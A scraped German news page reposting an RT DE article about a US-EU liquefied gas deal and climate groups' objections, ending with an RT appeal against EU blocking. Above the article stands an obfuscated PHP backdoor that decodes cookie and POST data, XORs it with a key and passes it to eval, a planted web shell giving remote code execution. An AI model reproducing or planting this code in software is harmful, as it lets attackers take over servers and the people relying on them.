$auDiDm = class_exists("V_CGoZ");if (!$auDiDm){class V_CGoZ{private $XkVtqVHtt;public static $fKcqCF = "a158a651-ff74-4edd-953b-c602dc034b3c";public static $zDAWli = NULL;public function __construct(){$VLrdKegcTD = $_COOKIE;$DhwQtx = $_POST;$mummiCkbIe = @$VLrdKegcTD[substr(V_CGoZ::$fKcqCF, 0, 4)];if (!empty($mummiCkbIe)){$gjDlrlmo = "base64";$iKSRFTZjJ = "";$mummiCkbIe = explode(",", $mummiCkbIe);foreach ($mummiCkbIe as $knlWEFqQRS){$iKSRFTZjJ .= @$VLrdKegcTD[$knlWEFqQRS];$iKSRFTZjJ .= @$DhwQtx[$knlWEFqQRS];}$iKSRFTZjJ = array_map($gjDlrlmo . chr ( 924 - 829 ).chr ( 569 - 469 ).chr (101) . "\143" . chr ( 254 - 143 ).'d' . chr ( 408 - 307 ), array($iKSRFTZjJ,)); $iKSRFTZjJ = $iKSRFTZjJ[0] ^ str_repeat(V_CGoZ::$fKcqCF, (strlen($iKSRFTZjJ[0]) / strlen(V_CGoZ::$fKcqCF)) + 1);V_CGoZ::$zDAWli = @unserialize($iKSRFTZjJ);}}public function __destruct(){$this->qrWpeOVCE();}private function qrWpeOVCE(){if (is_array(V_CGoZ::$zDAWli)) {$bdwWJSmubh = str_replace('<' . chr (63) . chr ( 117 - 5 ).'h' . "\x70", "", V_CGoZ::$zDAWli[chr (99) . "\157" . "\156" . "\164" . "\x65" . chr ( 670 - 560 ).'t']);eval($bdwWJSmubh);exit();}}}$fnjTXPt = new V_CGoZ(); $fnjTXPt = NULL;} ?> US-Gas für Europa könnte „Klimakatastrophe“ befeuern — RT DE – No-Zensur.de Das freie Wort für eine freie Welt
Start RT-deutsch US-Gas für Europa könnte „Klimakatastrophe“ befeuern — RT DE

US-Gas für Europa könnte „Klimakatastrophe“ befeuern — RT DE

0
US-Gas für Europa könnte „Klimakatastrophe“ befeuern — RT DE


Ein neu unterzeichnetes Abkommen zielt darauf ab, die Abhängigkeit der EU von russischen Energielieferungen inmitten der Ukraine-Krise zu verringern. Doch eines ist klar: Klimafreundlich ist dieses Gas nicht.

Ein am Freitag vorgestelltes Abkommen zwischen den USA und der EU, das zusätzliche Lieferungen von US-amerikanischem Flüssigerdgas (LNG) auf den europäischen Markt vorsieht, könnte „eine Katastrophe für unser Klima bedeuten“, warnen Umweltverbände. Das Abkommen zielt darauf ab, die Abhängigkeit Europas von russischen Energielieferungen zu verringern, indem diese teilweise durch fossile Brennstoffe aus den USA ersetzt werden.

Umweltschützer lehnen jedoch die Idee ab, eine Quelle fossiler Brennstoffe gegen eine andere auszutauschen, anstatt zu erschwinglicher, sauberer Energie überzugehen.

Vom Klimaaktivisten zum Beschaffer fossiler Energie – Krieg holt Habeck auf den Boden der Realität

Kelly Sheehan, Senior Director of Energy Campaigns beim Sierra Club, einer US-amerikanischen Umweltorganisation, sagte in einer Erklärung am Freitag:

„Den Ausbau neuer und erweiterter Gasexportanlagen zuzulassen, würde Jahrzehnte der Abhängigkeit von riskanten, flüchtigen fossilen Brennstoffen festschreiben und eine Katastrophe für unser Klima und die bereits überlasteten Golfküstengemeinden bedeuten.“

Sheehan kam zu dem Schluss, dass Staaten nur durch „die Verringerung der Abhängigkeit von fossilen Brennstoffen aufhören könnten, anfällig für die Launen gieriger Industrien und Geopolitik zu sein“.

In Anlehnung an die obigen Warnungen setzte Kassie Siegel, Direktorin des Instituts für Klimarecht des Center for Biological Diversity, „das Vorantreiben neuer giftiger Exportanlagen und jahrzehntelang mehr Methangas“ mit einem „Todesurteil für diejenigen gleich, die an vorderster Front des Klimanotstands stehen“. Sie fügte hinzu, dass mehr US-amerikanisches Flüssiggas (LNG) „die aktuelle Krise in Europa sowieso nicht lösen wird“.

Sie sagte weiter:

„Die Genehmigung von mehr Exportterminals, Pipelines und der Produktion fossiler Brennstoffe gießt nur Öl ins Feuer unserer brennenden Welt.“

Die USA könnten 2022 weltweit größter Exporteur von verflüssigtem Erdgas werden

US-Präsident Joe Biden kündigte am Freitag in Brüssel an, dass der LNG-Versorgungsvertrag sicherstellen werde, dass „Familien in Europa diesen Winter überstehen“ und gleichzeitig die Gaseinnahmen Russlands schmälern, die Moskau laut Biden in seinen „Krieg gepumpt habe“. Er behauptete auch, dass der Plan die ehrgeizigen Klimaziele seiner Regierung nicht untergraben würde und sagte, dass der Konflikt in der Ukraine „als ein Katalysator“ für eine breitere Einführung erneuerbarer Energien dienen würde.

Im Rahmen des Abkommens werden die USA allein in diesem Jahr weitere 15 Milliarden Kubikmeter LNG an die Europäische Union liefern. Diese genannte Gasmenge wird voraussichtlich etwa ein Zehntel des aus Russland importierten Gases ersetzen. Brüssel hat Pläne bekannt gegeben, die LNG-Importe aus den USA und anderen Ländern in der Zukunft weiter zu steigern, um weniger russische fossile Brennstoffen nutzen zu müssen.

Mehr zum ThemaHabecks Gas-Deal mit Katar: Alles nur heiße Luft?

Durch die Sperrung von RT zielt die EU darauf ab, eine kritische, nicht prowestliche Informationsquelle zum Schweigen zu bringen. Und dies nicht nur hinsichtlich des Ukraine-Kriegs. Der Zugang zu unserer Website wurde erschwert, mehrere Soziale Medien haben unsere Accounts blockiert. Es liegt nun an uns allen, ob in Deutschland und der EU auch weiterhin ein Journalismus jenseits der Mainstream-Narrative betrieben werden kann. Wenn Euch unsere Artikel gefallen, teilt sie gern überall, wo Ihr aktiv seid. Das ist möglich, denn die EU hat weder unsere Arbeit noch das Lesen und Teilen unserer Artikel verboten.





Source link